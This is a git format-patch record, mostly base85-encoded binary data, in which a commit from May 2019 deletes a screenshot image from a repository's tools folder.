zR1`GU#ocE@W)i$h@?IMfH$!L98vinimYR{DjvCa!jlc*-S;S$HrcgTUCu<%-8 zVQ2LfO{gVy9>}nImY3W`KozP!r&U8gBgEk;N9HS))7{y6FeJ^Ru_0l9b+zv^&1YWG z2^|qaUtMw*_fE-NN~PT2?&IrW5->(teB_nY-w^1N*$&ClkwAolK>6y;y^Z8{TibEj z#;*M=EY{&UnR}#R{%vtB8K*0NC(>7@r3cvPdw_gQBSLz_$}q6G@QTv*Zum_`-k3KRp+P-6p+frZC4_~!?lf7`*5tU7^<>j=yIgy z?&cWfrc(3q#RaoFM#!k*|A?5 z>Yml{ec%>O(0(FV>JfZfHC{YgUCm=}9v2&#`7SQrGcE^&+b=WeJ_;Rt;z&Qz!_z--K(Jqm{Nh(rtLoQMfLmtyt=(apv4 z_IsXF*ht3=hj5+cjO=c{O0$cDG!7_kMe(uIuTdS@cHES%Kh4Y`Zj5hIq8YNi*=JN| zd8Z~|gvfvY`t`G+TTYE6U4)HSCViETHE6|AqrT#7(LI3r+`8H&BE+FVLqn1z*Q28r z)8k;@8!*tdfzxv|>-NKoQB|b=KB}vIRVTvei>FVy(w1i;3{>iKBx(<{1 z(xLL%2`>oc1`1O^ke!eSGkBn?PhaM%<%vBPtkSd>TzvqyhJ!=D6ZqiOYs)GMtqy%oR~vy} zG$PWd=CgRd}?iHG(4Ezbuwe}vlM%=q()!jSp z?;V%4Sub*9YE#Xno}37h8i;a0M(Y7}7nlzC{H>lIy2GvaKl4{QOIp>4*Plr#(_R;4 z0U$<=9^HT8fn#ea5Jf*P6IdFJ(A10hpAMC(FeHM(2xmEFr3E22Jvs95`$%RWJ>%Nf ztG+hGU$|!nK7&_F-wzhgmyBTmP|J?jYQ(2Ah@j00_GWFV;w@F(kVy6hF+4aiMeEBX ztuVTxM!kD~>#Cc;)gm3AMpG1)a8X=AFWEm({-2{VVX}27ReNWwis5>%gH$UkC5t8A;MMV zeLB?j7x&cJx@=u3{QA~<{nc1S%Ov%J(R0~*JRn(Ecq{1&cVc`S-HXZJ&$`_SWv^rl zOY)ucd&O{#FGf zm;yxL2w_Ot*LHs$*#K*TOzb}2+XrJ*&Mfr5W5!zIx0S!i)@-X=BLX(oAq?lFLE1(} z7DrY4^f`LF#LabP)S`Ire|I7uv#rdd?FJe8=)tL<%cGvtL?Bic1{<5;}YytAD369 z?tC|B7ni)s_{`65lZH+W`7eN9{b>LI From 0fc194e762cd8b4bc74585e5e50fcf8ccf22383d Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 8 May 2019 01:01:06 +0100 Subject: [PATCH 098/214] Delete screenshot3.png --- tools/screenshot3.png | Bin 100649 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 tools/screenshot3.png diff --git a/tools/screenshot3.png b/tools/screenshot3.png deleted file mode 100644 index 82b269ae04561101188a6660e0e63b2c6512b53b..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 100649 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 